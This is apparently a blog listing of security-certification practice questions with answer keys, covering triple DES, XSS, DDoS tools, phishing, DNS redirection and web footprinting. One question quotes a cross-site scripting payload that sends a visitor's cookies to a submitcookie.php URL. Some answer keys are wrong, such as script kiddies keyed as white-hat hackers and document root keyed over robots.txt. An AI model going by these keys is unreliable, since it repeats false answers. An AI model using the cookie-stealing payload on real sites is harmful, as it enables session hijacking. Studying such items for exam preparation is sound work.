Which is this encryption algorithm?

in this form of encryption algorithm, every Individual block contains 64-bit data, and three keys are used, where each key consists of 56 bits. Which is this encryption algorithm?A . IDEAB . Triple Data Encryption standardC . MDS encryption algorithmD . AESView AnswerAnswer: B Explanation: Triple DES is another mode...

March 22, 2021No CommentsREAD MORE +

document.writef<img src="https://Ioca(host/submitcookie.php?

Judy created a forum, one day. she discovers that a user is posting strange images without writing comments. She immediately calls a security expert, who discovers that the following code is hidden behind those images: <script> document.writef<img src="https://Ioca(host/submitcookie.php? cookie ='+ escape(document.cookie)+ " />); </script> What issue occurred for the users...

March 21, 2021No CommentsREAD MORE +

What do Trinoo, TFN2k, WinTrinoo, T-Sight, and Stracheldraht have in common?

What do Trinoo, TFN2k, WinTrinoo, T-Sight, and Stracheldraht have in common?A . All are hacking tools developed by the legion of doomB . All are tools that can be used not only by hackers, but also security personnelC . All are DDOS toolsD . All are tools that are only...

March 21, 2021No CommentsREAD MORE +

Which file do you have to clean to clear the password?

By performing a penetration test, you gained access under a user account. During the test, you established a connection with your own machine via the SMB service and occasionally entered your login and password in plaintext. Which file do you have to clean to clear the password?A . .X session-logB...

March 21, 2021No CommentsREAD MORE +

What is the most likely cause?

An incident investigator asks to receive a copy of the event logs from all firewalls, proxy servers, and Intrusion Detection Systems (IDS) on the network of an organization that has experienced a possible breach of security. When the investigator attempts to correlate the information in all of the logs, the...

March 21, 2021No CommentsREAD MORE +

What is this technique called?

ViruXine.W32 virus hides their presence by changing the underlying executable code. This Virus code mutates while keeping the original algorithm intact, the code changes itself each time it runs, but the function of the code (its semantics) will not change at all. Here is a section of the Virus code:...

March 21, 2021No CommentsREAD MORE +

Which of the following statement is incorrect related to this attack?

In this attack, a victim receives an e-mail claiming from PayPal stating that their account has been disabled and confirmation is required before activation. The attackers then scam to collect not one but two credit card numbers, ATM PIN number and other personal details. Ignorant users usually fall prey to...

March 21, 2021No CommentsREAD MORE +

What is the name of this kind of attack?

An attacker is trying to redirect the traffic of a small office. That office is using their own mail server, DNS server and NTP server because of the importance of their job. The attacker gain access to the DNS server and redirect the direction www.google.com to his own IP address....

March 21, 2021No CommentsREAD MORE +

What kind of hackers are we talking about?

These hackers have limited or no training and know how to use only basic techniques or tools. What kind of hackers are we talking about?A . Black-Hat Hackers AB . Script KiddiesC . White-Hat HackersD . Gray-Hat HackerView AnswerAnswer: C

March 21, 20212 CommentsREAD MORE +

Which file is a rich target to discover the structure of a website during web-server footprinting?

Which file is a rich target to discover the structure of a website during web-server footprinting?A . Document rootB . Robots.txtC . domain.octD . index.htmlView AnswerAnswer: A Explanation: The document root is a directory (a folder) that is stored on your host’s servers and that is designated for holding web...

March 21, 2021No CommentsREAD MORE +